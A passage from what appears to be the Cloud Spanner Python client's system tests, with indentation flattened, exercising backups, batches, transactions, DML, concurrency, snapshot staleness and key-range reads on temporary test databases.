for backup in instance.list_backups(filter_=filter_):
self.assertEqual(backup.name, backup2.name)
# List backups filtered by backup name.
filter_ = "name:{0}".format(backup_id_1)
for backup in instance.list_backups(filter_=filter_):
self.assertEqual(backup.name, backup1.name)
# List backups filtered by database name.
filter_ = "database:{0}".format(self._dbs[0].name)
for backup in instance.list_backups(filter_=filter_):
self.assertEqual(backup.name, backup1.name)
# List backups filtered by create time.
filter_ = 'create_time > "{0}"'.format(
create_time_compare.strftime("%Y-%m-%dT%H:%M:%S.%fZ")
)
for backup in instance.list_backups(filter_=filter_):
self.assertEqual(backup.name, backup2.name)
# List backups filtered by expire time.
filter_ = 'expire_time > "{0}"'.format(
expire_time_1.strftime("%Y-%m-%dT%H:%M:%S.%fZ")
)
for backup in instance.list_backups(filter_=filter_):
self.assertEqual(backup.name, backup1.name)
# List backups filtered by size bytes.
filter_ = "size_bytes < {0}".format(backup1.size_bytes)
for backup in instance.list_backups(filter_=filter_):
self.assertEqual(backup.name, backup2.name)
# List backups using pagination.
for page in instance.list_backups(page_size=1).pages:
count = 0
for backup in page:
count += 1
self.assertEqual(count, 1)
SOME_DATE = datetime.date(2011, 1, 17)
SOME_TIME = datetime.datetime(1989, 1, 17, 17, 59, 12, 345612)
NANO_TIME = DatetimeWithNanoseconds(1995, 8, 31, nanosecond=987654321)
POS_INF = float("+inf")
NEG_INF = float("-inf")
OTHER_NAN, = struct.unpack("<d", b"\x01\x00\x01\x00\x00\x00\xf8\xff")
BYTES_1 = b"Ymlu"
BYTES_2 = b"Ym9vdHM="
ALL_TYPES_TABLE = "all_types"
ALL_TYPES_COLUMNS = (
"pkey",
"int_value",
"int_array",
"bool_value",
"bool_array",
"bytes_value",
"bytes_array",
"date_value",
"date_array",
"float_value",
"float_array",
"string_value",
"string_array",
"timestamp_value",
"timestamp_array",
)
AllTypesRowData = collections.namedtuple("AllTypesRowData", ALL_TYPES_COLUMNS)
AllTypesRowData.__new__.__defaults__ = tuple([None for colum in ALL_TYPES_COLUMNS])
ALL_TYPES_ROWDATA = (
# all nulls
AllTypesRowData(pkey=0),
# Non-null values
AllTypesRowData(pkey=101, int_value=123),
AllTypesRowData(pkey=102, bool_value=False),
AllTypesRowData(pkey=103, bytes_value=BYTES_1),
AllTypesRowData(pkey=104, date_value=SOME_DATE),
AllTypesRowData(pkey=105, float_value=1.4142136),
AllTypesRowData(pkey=106, string_value=u"VALUE"),
AllTypesRowData(pkey=107, timestamp_value=SOME_TIME),
AllTypesRowData(pkey=108, timestamp_value=NANO_TIME),
# empty array values
AllTypesRowData(pkey=201, int_array=[]),
AllTypesRowData(pkey=202, bool_array=[]),
AllTypesRowData(pkey=203, bytes_array=[]),
AllTypesRowData(pkey=204, date_array=[]),
AllTypesRowData(pkey=205, float_array=[]),
AllTypesRowData(pkey=206, string_array=[]),
AllTypesRowData(pkey=207, timestamp_array=[]),
# non-empty array values, including nulls
AllTypesRowData(pkey=301, int_array=[123, 456, None]),
AllTypesRowData(pkey=302, bool_array=[True, False, None]),
AllTypesRowData(pkey=303, bytes_array=[BYTES_1, BYTES_2, None]),
AllTypesRowData(pkey=304, date_array=[SOME_DATE, None]),
AllTypesRowData(pkey=305, float_array=[3.1415926, 2.71828, None]),
AllTypesRowData(pkey=306, string_array=[u"One", u"Two", None]),
AllTypesRowData(pkey=307, timestamp_array=[SOME_TIME, NANO_TIME, None]),
)
class TestSessionAPI(unittest.TestCase, _TestData):
DATABASE_NAME = "test_sessions" + unique_resource_id("_")
@classmethod
def setUpClass(cls):
pool = BurstyPool(labels={"testcase": "session_api"})
cls._db = Config.INSTANCE.database(
cls.DATABASE_NAME, ddl_statements=DDL_STATEMENTS, pool=pool
)
operation = cls._db.create()
operation.result(30) # raises on failure / timeout.
@classmethod
def tearDownClass(cls):
cls._db.drop()
def setUp(self):
self.to_delete = []
def tearDown(self):
for doomed in self.to_delete:
doomed.delete()
def test_session_crud(self):
retry_true = RetryResult(operator.truth)
retry_false = RetryResult(operator.not_)
session = self._db.session()
self.assertFalse(session.exists())
session.create()
retry_true(session.exists)()
session.delete()
retry_false(session.exists)()
def test_batch_insert_then_read(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
with self._db.batch() as batch:
batch.delete(self.TABLE, self.ALL)
batch.insert(self.TABLE, self.COLUMNS, self.ROW_DATA)
with self._db.snapshot(read_timestamp=batch.committed) as snapshot:
rows = list(snapshot.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(rows)
def test_batch_insert_then_read_string_array_of_string(self):
TABLE = "string_plus_array_of_string"
COLUMNS = ["id", "name", "tags"]
ROWDATA = [
(0, None, None),
(1, "phred", ["yabba", "dabba", "do"]),
(2, "bharney", []),
(3, "wylma", ["oh", None, "phred"]),
]
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
with self._db.batch() as batch:
batch.delete(TABLE, self.ALL)
batch.insert(TABLE, COLUMNS, ROWDATA)
with self._db.snapshot(read_timestamp=batch.committed) as snapshot:
rows = list(snapshot.read(TABLE, COLUMNS, self.ALL))
self._check_rows_data(rows, expected=ROWDATA)
def test_batch_insert_then_read_all_datatypes(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
with self._db.batch() as batch:
batch.delete(ALL_TYPES_TABLE, self.ALL)
batch.insert(ALL_TYPES_TABLE, ALL_TYPES_COLUMNS, ALL_TYPES_ROWDATA)
with self._db.snapshot(read_timestamp=batch.committed) as snapshot:
rows = list(snapshot.read(ALL_TYPES_TABLE, ALL_TYPES_COLUMNS, self.ALL))
self._check_rows_data(rows, expected=ALL_TYPES_ROWDATA)
def test_batch_insert_or_update_then_query(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
with self._db.batch() as batch:
batch.insert_or_update(self.TABLE, self.COLUMNS, self.ROW_DATA)
with self._db.snapshot(read_timestamp=batch.committed) as snapshot:
rows = list(snapshot.execute_sql(self.SQL))
self._check_rows_data(rows)
def test_batch_insert_w_commit_timestamp(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
table = "users_history"
columns = ["id", "commit_ts", "name", "email", "deleted"]
user_id = 1234
name = "phred"
email = "phred@example.com"
row_data = [[user_id, COMMIT_TIMESTAMP, name, email, False]]
with self._db.batch() as batch:
batch.delete(table, self.ALL)
batch.insert(table, columns, row_data)
with self._db.snapshot(read_timestamp=batch.committed) as snapshot:
rows = list(snapshot.read(table, columns, self.ALL))
self.assertEqual(len(rows), 1)
r_id, commit_ts, r_name, r_email, deleted = rows[0]
self.assertEqual(r_id, user_id)
self.assertEqual(commit_ts, batch.committed)
self.assertEqual(r_name, name)
self.assertEqual(r_email, email)
self.assertFalse(deleted)
@RetryErrors(exception=exceptions.ServerError)
@RetryErrors(exception=exceptions.Aborted)
def test_transaction_read_and_insert_then_rollback(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
session = self._db.session()
session.create()
self.to_delete.append(session)
with self._db.batch() as batch:
batch.delete(self.TABLE, self.ALL)
transaction = session.transaction()
transaction.begin()
rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
transaction.insert(self.TABLE, self.COLUMNS, self.ROW_DATA)
# Inserted rows can't be read until after commit.
rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
transaction.rollback()
rows = list(session.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
def _transaction_read_then_raise(self, transaction):
rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(len(rows), 0)
transaction.insert(self.TABLE, self.COLUMNS, self.ROW_DATA)
raise CustomException()
@RetryErrors(exception=exceptions.ServerError)
@RetryErrors(exception=exceptions.Conflict)
def test_transaction_read_and_insert_then_exception(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
with self._db.batch() as batch:
batch.delete(self.TABLE, self.ALL)
with self.assertRaises(CustomException):
self._db.run_in_transaction(self._transaction_read_then_raise)
# Transaction was rolled back.
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
@RetryErrors(exception=exceptions.ServerError)
@RetryErrors(exception=exceptions.Conflict)
def test_transaction_read_and_insert_or_update_then_commit(self):
# [START spanner_test_dml_read_your_writes]
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
session = self._db.session()
session.create()
self.to_delete.append(session)
with session.batch() as batch:
batch.delete(self.TABLE, self.ALL)
with session.transaction() as transaction:
rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
transaction.insert_or_update(self.TABLE, self.COLUMNS, self.ROW_DATA)
# Inserted rows can't be read until after commit.
rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
rows = list(session.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(rows)
# [END spanner_test_dml_read_your_writes]
def _generate_insert_statements(self):
insert_template = "INSERT INTO {table} ({column_list}) " "VALUES ({row_data})"
for row in self.ROW_DATA:
yield insert_template.format(
table=self.TABLE,
column_list=", ".join(self.COLUMNS),
row_data='{}, "{}", "{}", "{}"'.format(*row),
)
@RetryErrors(exception=exceptions.ServerError)
@RetryErrors(exception=exceptions.Conflict)
def test_transaction_execute_sql_w_dml_read_rollback(self):
# [START spanner_test_dml_rollback_txn_not_committed]
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
session = self._db.session()
session.create()
self.to_delete.append(session)
with session.batch() as batch:
batch.delete(self.TABLE, self.ALL)
transaction = session.transaction()
transaction.begin()
rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
for insert_statement in self._generate_insert_statements():
result = transaction.execute_sql(insert_statement)
list(result) # iterate to get stats
self.assertEqual(result.stats.row_count_exact, 1)
# Rows inserted via DML *can* be read before commit.
during_rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(during_rows)
transaction.rollback()
rows = list(session.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(rows, [])
# [END spanner_test_dml_rollback_txn_not_committed]
@RetryErrors(exception=exceptions.ServerError)
@RetryErrors(exception=exceptions.Conflict)
def test_transaction_execute_update_read_commit(self):
# [START spanner_test_dml_read_your_writes]
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
session = self._db.session()
session.create()
self.to_delete.append(session)
with session.batch() as batch:
batch.delete(self.TABLE, self.ALL)
with session.transaction() as transaction:
rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
for insert_statement in self._generate_insert_statements():
row_count = transaction.execute_update(insert_statement)
self.assertEqual(row_count, 1)
# Rows inserted via DML *can* be read before commit.
during_rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(during_rows)
rows = list(session.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(rows)
# [END spanner_test_dml_read_your_writes]
@RetryErrors(exception=exceptions.ServerError)
@RetryErrors(exception=exceptions.Conflict)
def test_transaction_execute_update_then_insert_commit(self):
# [START spanner_test_dml_with_mutation]
# [START spanner_test_dml_update]
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
session = self._db.session()
session.create()
self.to_delete.append(session)
with session.batch() as batch:
batch.delete(self.TABLE, self.ALL)
insert_statement = list(self._generate_insert_statements())[0]
with session.transaction() as transaction:
rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
row_count = transaction.execute_update(insert_statement)
self.assertEqual(row_count, 1)
transaction.insert(self.TABLE, self.COLUMNS, self.ROW_DATA[1:])
rows = list(session.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(rows)
# [END spanner_test_dml_update]
# [END spanner_test_dml_with_mutation]
@staticmethod
def _check_batch_status(status_code, expected=code_pb2.OK):
if status_code != expected:
grpc_status_code = _STATUS_CODE_TO_GRPC_STATUS_CODE[status_code]
call = FauxCall(status_code)
raise exceptions.from_grpc_status(
grpc_status_code, "batch_update failed", errors=[call]
)
def test_transaction_batch_update_success(self):
# [START spanner_test_dml_with_mutation]
# [START spanner_test_dml_update]
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
session = self._db.session()
session.create()
self.to_delete.append(session)
with session.batch() as batch:
batch.delete(self.TABLE, self.ALL)
insert_statement = list(self._generate_insert_statements())[0]
update_statement = (
"UPDATE contacts SET email = @email " "WHERE contact_id = @contact_id;",
{"contact_id": 1, "email": "phreddy@example.com"},
{"contact_id": Type(code=INT64), "email": Type(code=STRING)},
)
delete_statement = (
"DELETE contacts WHERE contact_id = @contact_id;",
{"contact_id": 1},
{"contact_id": Type(code=INT64)},
)
def unit_of_work(transaction, self):
rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
status, row_counts = transaction.batch_update(
[insert_statement, update_statement, delete_statement]
)
self._check_batch_status(status.code)
self.assertEqual(len(row_counts), 3)
for row_count in row_counts:
self.assertEqual(row_count, 1)
session.run_in_transaction(unit_of_work, self)
rows = list(session.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(rows, [])
# [END spanner_test_dml_with_mutation]
# [END spanner_test_dml_update]
def test_transaction_batch_update_and_execute_dml(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
session = self._db.session()
session.create()
self.to_delete.append(session)
with session.batch() as batch:
batch.delete(self.TABLE, self.ALL)
insert_statements = list(self._generate_insert_statements())
update_statements = [
(
"UPDATE contacts SET email = @email " "WHERE contact_id = @contact_id;",
{"contact_id": 1, "email": "phreddy@example.com"},
{"contact_id": Type(code=INT64), "email": Type(code=STRING)},
)
]
delete_statement = "DELETE contacts WHERE TRUE;"
def unit_of_work(transaction, self):
rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
status, row_counts = transaction.batch_update(
insert_statements + update_statements
)
self._check_batch_status(status.code)
self.assertEqual(len(row_counts), len(insert_statements) + 1)
for row_count in row_counts:
self.assertEqual(row_count, 1)
row_count = transaction.execute_update(delete_statement)
self.assertEqual(row_count, len(insert_statements))
session.run_in_transaction(unit_of_work, self)
rows = list(session.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(rows, [])
def test_transaction_batch_update_w_syntax_error(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
session = self._db.session()
session.create()
self.to_delete.append(session)
with session.batch() as batch:
batch.delete(self.TABLE, self.ALL)
insert_statement = list(self._generate_insert_statements())[0]
update_statement = (
"UPDTAE contacts SET email = @email " "WHERE contact_id = @contact_id;",
{"contact_id": 1, "email": "phreddy@example.com"},
{"contact_id": Type(code=INT64), "email": Type(code=STRING)},
)
delete_statement = (
"DELETE contacts WHERE contact_id = @contact_id;",
{"contact_id": 1},
{"contact_id": Type(code=INT64)},
)
def unit_of_work(transaction):
rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
status, row_counts = transaction.batch_update(
[insert_statement, update_statement, delete_statement]
)
self._check_batch_status(status.code, code_pb2.INVALID_ARGUMENT)
self.assertEqual(len(row_counts), 1)
self.assertEqual(row_counts[0], 1)
session.run_in_transaction(unit_of_work)
def test_transaction_batch_update_wo_statements(self):
from google.api_core.exceptions import InvalidArgument
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
session = self._db.session()
session.create()
self.to_delete.append(session)
with session.transaction() as transaction:
with self.assertRaises(InvalidArgument):
transaction.batch_update([])
def test_execute_partitioned_dml(self):
# [START spanner_test_dml_partioned_dml_update]
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
delete_statement = "DELETE FROM {} WHERE true".format(self.TABLE)
def _setup_table(txn):
txn.execute_update(delete_statement)
for insert_statement in self._generate_insert_statements():
txn.execute_update(insert_statement)
committed = self._db.run_in_transaction(_setup_table)
with self._db.snapshot(read_timestamp=committed) as snapshot:
before_pdml = list(snapshot.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(before_pdml)
nonesuch = "nonesuch@example.com"
target = "phred@example.com"
update_statement = (
"UPDATE {table} SET {table}.email = @email " "WHERE {table}.email = @target"
).format(table=self.TABLE)
row_count = self._db.execute_partitioned_dml(
update_statement,
params={"email": nonesuch, "target": target},
param_types={"email": Type(code=STRING), "target": Type(code=STRING)},
)
self.assertEqual(row_count, 1)
row = self.ROW_DATA[0]
updated = [row[:3] + (nonesuch,)] + list(self.ROW_DATA[1:])
with self._db.snapshot(read_timestamp=committed) as snapshot:
after_update = list(snapshot.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(after_update, updated)
row_count = self._db.execute_partitioned_dml(delete_statement)
self.assertEqual(row_count, len(self.ROW_DATA))
with self._db.snapshot(read_timestamp=committed) as snapshot:
after_delete = list(snapshot.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(after_delete, [])
# [END spanner_test_dml_partioned_dml_update]
def _transaction_concurrency_helper(self, unit_of_work, pkey):
INITIAL_VALUE = 123
NUM_THREADS = 3 # conforms to equivalent Java systest.
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
with self._db.batch() as batch:
batch.insert_or_update(
COUNTERS_TABLE, COUNTERS_COLUMNS, [[pkey, INITIAL_VALUE]]
)
# We don't want to run the threads' transactions in the current
# session, which would fail.
txn_sessions = []
for _ in range(NUM_THREADS):
txn_sessions.append(self._db)
threads = [
threading.Thread(
target=txn_session.run_in_transaction, args=(unit_of_work, pkey)
)
for txn_session in txn_sessions
]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
with self._db.snapshot() as snapshot:
keyset = KeySet(keys=[(pkey,)])
rows = list(snapshot.read(COUNTERS_TABLE, COUNTERS_COLUMNS, keyset))
self.assertEqual(len(rows), 1)
_, value = rows[0]
self.assertEqual(value, INITIAL_VALUE + len(threads))
def _read_w_concurrent_update(self, transaction, pkey):
keyset = KeySet(keys=[(pkey,)])
rows = list(transaction.read(COUNTERS_TABLE, COUNTERS_COLUMNS, keyset))
self.assertEqual(len(rows), 1)
pkey, value = rows[0]
transaction.update(COUNTERS_TABLE, COUNTERS_COLUMNS, [[pkey, value + 1]])
def test_transaction_read_w_concurrent_updates(self):
PKEY = "read_w_concurrent_updates"
self._transaction_concurrency_helper(self._read_w_concurrent_update, PKEY)
def _query_w_concurrent_update(self, transaction, pkey):
SQL = "SELECT * FROM counters WHERE name = @name"
rows = list(
transaction.execute_sql(
SQL, params={"name": pkey}, param_types={"name": Type(code=STRING)}
)
)
self.assertEqual(len(rows), 1)
pkey, value = rows[0]
transaction.update(COUNTERS_TABLE, COUNTERS_COLUMNS, [[pkey, value + 1]])
def test_transaction_query_w_concurrent_updates(self):
PKEY = "query_w_concurrent_updates"
self._transaction_concurrency_helper(self._query_w_concurrent_update, PKEY)
@unittest.skipIf(USE_EMULATOR, "Skipping concurrent transactions")
def test_transaction_read_w_abort(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
trigger = _ReadAbortTrigger()
with self._db.batch() as batch:
batch.delete(COUNTERS_TABLE, self.ALL)
batch.insert(
COUNTERS_TABLE, COUNTERS_COLUMNS, [[trigger.KEY1, 0], [trigger.KEY2, 0]]
)
provoker = threading.Thread(target=trigger.provoke_abort, args=(self._db,))
handler = threading.Thread(target=trigger.handle_abort, args=(self._db,))
provoker.start()
trigger.provoker_started.wait()
handler.start()
trigger.handler_done.wait()
provoker.join()
handler.join()
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(COUNTERS_TABLE, COUNTERS_COLUMNS, self.ALL))
self._check_row_data(rows, expected=[[trigger.KEY1, 1], [trigger.KEY2, 1]])
@staticmethod
def _row_data(max_index):
for index in range(max_index):
yield (
index,
"First%09d" % (index,),
"Last%09d" % (max_index - index),
"test-%09d@example.com" % (index,),
)
def _set_up_table(self, row_count, database=None):
if database is None:
database = self._db
retry = RetryInstanceState(_has_all_ddl)
retry(database.reload)()
def _unit_of_work(transaction, test):
transaction.delete(test.TABLE, test.ALL)
transaction.insert(test.TABLE, test.COLUMNS, test._row_data(row_count))
committed = database.run_in_transaction(_unit_of_work, test=self)
return committed
def test_read_with_single_keys_index(self):
# [START spanner_test_single_key_index_read]
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
self._set_up_table(row_count)
expected = [[row[1], row[2]] for row in self._row_data(row_count)]
row = 5
keyset = [[expected[row][0], expected[row][1]]]
with self._db.snapshot() as snapshot:
results_iter = snapshot.read(
self.TABLE, columns, KeySet(keys=keyset), index="name"
)
rows = list(results_iter)
self.assertEqual(rows, [expected[row]])
# [END spanner_test_single_key_index_read]
def test_empty_read_with_single_keys_index(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
self._set_up_table(row_count)
keyset = [["Non", "Existent"]]
with self._db.snapshot() as snapshot:
results_iter = snapshot.read(
self.TABLE, columns, KeySet(keys=keyset), index="name"
)
rows = list(results_iter)
self.assertEqual(rows, [])
def test_read_with_multiple_keys_index(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
self._set_up_table(row_count)
expected = [[row[1], row[2]] for row in self._row_data(row_count)]
with self._db.snapshot() as snapshot:
rows = list(
snapshot.read(self.TABLE, columns, KeySet(keys=expected), index="name")
)
self.assertEqual(rows, expected)
def test_snapshot_read_w_various_staleness(self):
from datetime import datetime
from google.cloud._helpers import UTC
ROW_COUNT = 400
committed = self._set_up_table(ROW_COUNT)
all_data_rows = list(self._row_data(ROW_COUNT))
before_reads = datetime.utcnow().replace(tzinfo=UTC)
# Test w/ read timestamp
with self._db.snapshot(read_timestamp=committed) as read_tx:
rows = list(read_tx.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(rows, all_data_rows)
# Test w/ min read timestamp
with self._db.snapshot(min_read_timestamp=committed) as min_read_ts:
rows = list(min_read_ts.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(rows, all_data_rows)
staleness = datetime.utcnow().replace(tzinfo=UTC) - before_reads
# Test w/ max staleness
with self._db.snapshot(max_staleness=staleness) as max_staleness:
rows = list(max_staleness.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(rows, all_data_rows)
# Test w/ exact staleness
with self._db.snapshot(exact_staleness=staleness) as exact_staleness:
rows = list(exact_staleness.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(rows, all_data_rows)
# Test w/ strong
with self._db.snapshot() as strong:
rows = list(strong.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(rows, all_data_rows)
def test_multiuse_snapshot_read_isolation_strong(self):
ROW_COUNT = 40
self._set_up_table(ROW_COUNT)
all_data_rows = list(self._row_data(ROW_COUNT))
with self._db.snapshot(multi_use=True) as strong:
before = list(strong.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(before, all_data_rows)
with self._db.batch() as batch:
batch.delete(self.TABLE, self.ALL)
after = list(strong.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(after, all_data_rows)
def test_multiuse_snapshot_read_isolation_read_timestamp(self):
ROW_COUNT = 40
committed = self._set_up_table(ROW_COUNT)
all_data_rows = list(self._row_data(ROW_COUNT))
with self._db.snapshot(read_timestamp=committed, multi_use=True) as read_ts:
before = list(read_ts.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(before, all_data_rows)
with self._db.batch() as batch:
batch.delete(self.TABLE, self.ALL)
after = list(read_ts.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(after, all_data_rows)
def test_multiuse_snapshot_read_isolation_exact_staleness(self):
ROW_COUNT = 40
self._set_up_table(ROW_COUNT)
all_data_rows = list(self._row_data(ROW_COUNT))
time.sleep(1)
delta = datetime.timedelta(microseconds=1000)
with self._db.snapshot(exact_staleness=delta, multi_use=True) as exact:
before = list(exact.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(before, all_data_rows)
with self._db.batch() as batch:
batch.delete(self.TABLE, self.ALL)
after = list(exact.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(after, all_data_rows)
def test_read_w_index(self):
ROW_COUNT = 2000
# Indexed reads cannot return non-indexed columns
MY_COLUMNS = self.COLUMNS[0], self.COLUMNS[2]
EXTRA_DDL = ["CREATE INDEX contacts_by_last_name ON contacts(last_name)"]
pool = BurstyPool(labels={"testcase": "read_w_index"})
temp_db = Config.INSTANCE.database(
"test_read" + unique_resource_id("_"),
ddl_statements=DDL_STATEMENTS + EXTRA_DDL,
pool=pool,
)
operation = temp_db.create()
self.to_delete.append(_DatabaseDropper(temp_db))
# We want to make sure the operation completes.
operation.result(30) # raises on failure / timeout.
committed = self._set_up_table(ROW_COUNT, database=temp_db)
with temp_db.snapshot(read_timestamp=committed) as snapshot:
rows = list(
snapshot.read(
self.TABLE, MY_COLUMNS, self.ALL, index="contacts_by_last_name"
)
)
expected = list(
reversed([(row[0], row[2]) for row in self._row_data(ROW_COUNT)])
)
self._check_rows_data(rows, expected)
def test_read_w_single_key(self):
# [START spanner_test_single_key_read]
ROW_COUNT = 40
committed = self._set_up_table(ROW_COUNT)
with self._db.snapshot(read_timestamp=committed) as snapshot:
rows = list(snapshot.read(self.TABLE, self.COLUMNS, KeySet(keys=[(0,)])))
all_data_rows = list(self._row_data(ROW_COUNT))
expected = [all_data_rows[0]]
self._check_row_data(rows, expected)
# [END spanner_test_single_key_read]
def test_empty_read(self):
# [START spanner_test_empty_read]
ROW_COUNT = 40
self._set_up_table(ROW_COUNT)
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(self.TABLE, self.COLUMNS, KeySet(keys=[(40,)])))
self._check_row_data(rows, [])
# [END spanner_test_empty_read]
def test_read_w_multiple_keys(self):
ROW_COUNT = 40
indices = [0, 5, 17]
committed = self._set_up_table(ROW_COUNT)
with self._db.snapshot(read_timestamp=committed) as snapshot:
rows = list(
snapshot.read(
self.TABLE,
self.COLUMNS,
KeySet(keys=[(index,) for index in indices]),
)
)
all_data_rows = list(self._row_data(ROW_COUNT))
expected = [row for row in all_data_rows if row[0] in indices]
self._check_row_data(rows, expected)
def test_read_w_limit(self):
ROW_COUNT = 3000
LIMIT = 100
committed = self._set_up_table(ROW_COUNT)
with self._db.snapshot(read_timestamp=committed) as snapshot:
rows = list(snapshot.read(self.TABLE, self.COLUMNS, self.ALL, limit=LIMIT))
all_data_rows = list(self._row_data(ROW_COUNT))
expected = all_data_rows[:LIMIT]
self._check_row_data(rows, expected)
def test_read_w_ranges(self):
ROW_COUNT = 3000
START = 1000
END = 2000
committed = self._set_up_table(ROW_COUNT)
with self._db.snapshot(read_timestamp=committed, multi_use=True) as snapshot:
all_data_rows = list(self._row_data(ROW_COUNT))
single_key = KeyRange(start_closed=[START], end_open=[START + 1])
keyset = KeySet(ranges=(single_key,))
rows = list(snapshot.read(self.TABLE, self.COLUMNS, keyset))
expected = all_data_rows[START : START + 1]
self._check_rows_data(rows, expected)
closed_closed = KeyRange(start_closed=[START], end_closed=[END])
keyset = KeySet(ranges=(closed_closed,))
rows = list(snapshot.read(self.TABLE, self.COLUMNS, keyset))
expected = all_data_rows[START : END + 1]
self._check_row_data(rows, expected)
closed_open = KeyRange(start_closed=[START], end_open=[END])
keyset = KeySet(ranges=(closed_open,))
rows = list(snapshot.read(self.TABLE, self.COLUMNS, keyset))
expected = all_data_rows[START:END]
self._check_row_data(rows, expected)
open_open = KeyRange(start_open=[START], end_open=[END])
keyset = KeySet(ranges=(open_open,))
rows = list(snapshot.read(self.TABLE, self.COLUMNS, keyset))
expected = all_data_rows[START + 1 : END]
self._check_row_data(rows, expected)
open_closed = KeyRange(start_open=[START], end_closed=[END])
keyset = KeySet(ranges=(open_closed,))
rows = list(snapshot.read(self.TABLE, self.COLUMNS, keyset))
expected = all_data_rows[START + 1 : END + 1]
self._check_row_data(rows, expected)
def test_read_partial_range_until_end(self):
row_count = 3000
start = 1000
committed = self._set_up_table(row_count)
with self._db.snapshot(read_timestamp=committed, multi_use=True) as snapshot:
all_data_rows = list(self._row_data(row_count))
expected_map = {
("start_closed", "end_closed"): all_data_rows[start:],
("start_closed", "end_open"): [],
("start_open", "end_closed"): all_data_rows[start + 1 :],
("start_open", "end_open"): [],
}
for start_arg in ("start_closed", "start_open"):
for end_arg in ("end_closed", "end_open"):
range_kwargs = {start_arg: [start], end_arg: []}
keyset = KeySet(ranges=(KeyRange(**range_kwargs),))
rows = list(snapshot.read(self.TABLE, self.COLUMNS, keyset))
expected = expected_map[(start_arg, end_arg)]
self._check_row_data(rows, expected)
def test_read_partial_range_from_beginning(self):
row_count = 3000
end = 2000
committed = self._set_up_table(row_count)
all_data_rows = list(self._row_data(row_count))
expected_map = {
("start_closed", "end_closed"): all_data_rows[: end + 1],
("start_closed", "end_open"): all_data_rows[:end],
("start_open", "end_closed"): [],
("start_open", "end_open"): [],
}
for start_arg in ("start_closed", "start_open"):
for end_arg in ("end_closed", "end_open"):
range_kwargs = {start_arg: [], end_arg: [end]}
keyset = KeySet(ranges=(KeyRange(**range_kwargs),))
with self._db.snapshot(read_timestamp=committed, multi_use=True) as snapshot:
rows = list(snapshot.read(self.TABLE, self.COLUMNS, keyset))
expected = expected_map[(start_arg, end_arg)]
self._check_row_data(rows, expected)
def test_read_with_range_keys_index_single_key(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
data = [[row[1], row[2]] for row in self._row_data(row_count)]
self._set_up_table(row_count)
start = 3
krange = KeyRange(start_closed=data[start], end_open=data[start + 1])
keyset = KeySet(ranges=(krange,))
with self._db.snapshot() as snapshot:
